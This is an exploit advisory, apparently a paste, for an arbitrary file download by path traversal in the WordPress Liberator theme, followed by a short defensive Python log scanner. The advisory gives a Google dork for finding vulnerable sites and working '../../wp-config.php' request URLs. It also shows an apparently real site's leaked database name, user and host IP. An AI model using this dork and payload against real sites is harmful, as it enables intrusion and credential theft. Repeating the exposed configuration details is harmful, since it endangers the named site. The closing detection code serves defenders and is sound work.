KingSkrupellos

WordPress 5.1.1 Liberator Themes Arbitrary File Download

Mar 18th, 2019
############################################################################################

# Exploit Title : WordPress 5.1.1 Liberator Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : wordpress.org ~ televox.com
# Software Information Link : televox.com/website-design/
televox.com/webvox/wp-content/themes/liberator/readme.txt
# Software Affected Version : 4.x - 5.x - 5.1.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:"/wp-content/themes/liberator/inc/"
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019030143

############################################################################################

# Impact :
***********
* WordPress 5.1.1 Liberator Themes is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the web server process and obtain potentially sensitive information.
* An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
* The software has a Relative Path Traversal vulnerability: it uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

Vulnerable File =>

/download.php

Vulnerable Parameter =>

?download_file=

# Arbitrary File Download Exploit :
*******************************
/PATH/wp-content/themes/liberator/inc/php/download.php?download_file=[FILENAME]

/wp-content/themes/liberator/inc/php/download.php?download_file=[FILENAME]

/wp-content/themes/liberator/inc/php/download.php?download_file=../../wp-config.php

Information About the MySQL Configuration File =>
*******************************************
/** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', '');

############################################################################################

[+] televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../../wp-config.php

/** The name of the database for WordPress */
define('DB_NAME', 'wpwestprod');

/** MySQL database username */
define('DB_USER', 'srvwpuser');

/** MySQL database password */
define('DB_PASSWORD', '[REDACTED]');

/** MySQL hostname */
define('DB_HOST', '75.78.178.16');

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################
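
For defenders reviewing web server logs, the following added example (not part of the original paste and not code from the theme) flags requests to the download.php endpoint whose download_file value leaves the download directory, including percent-encoded and double-encoded forms. The combined access log format, the function names and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter named in the advisory.
ENDPOINT = "/wp-content/themes/liberator/inc/php/download.php"
PARAM = "download_file"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2019:10:00:01 +0000] "GET /wp-content/themes/liberator/inc/php/download.php?download_file=brochure.pdf HTTP/1.1" 200 48211',
    '198.51.100.7 - - [18/Mar/2019:10:02:13 +0000] "GET /wp-content/themes/liberator/inc/php/download.php?download_file=../../wp-config.php HTTP/1.1" 200 3120',
    '203.0.113.5 - - [18/Mar/2019:10:05:44 +0000] "GET /site/wp-content/themes/liberator/inc/php/download.php?download_file=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3120',
    '192.0.2.10 - - [18/Mar/2019:10:06:02 +0000] "GET /index.php?download_file=../x HTTP/1.1" 404 0',
]

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded sequences are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True for a '..' path segment, an absolute path or an embedded NUL byte."""
    v = decode_fully(value).replace("\\", "/")
    return ".." in v.split("/") or v.startswith("/") or "\x00" in v

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for each traversal attempt on the endpoint."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(ENDPOINT):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(value):
                hits.append((line.split()[0], decode_fully(value)))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} requested {PARAM}={value}")
```

A hit with a 200 response means the file contents were likely served, so any credentials in that file should be rotated.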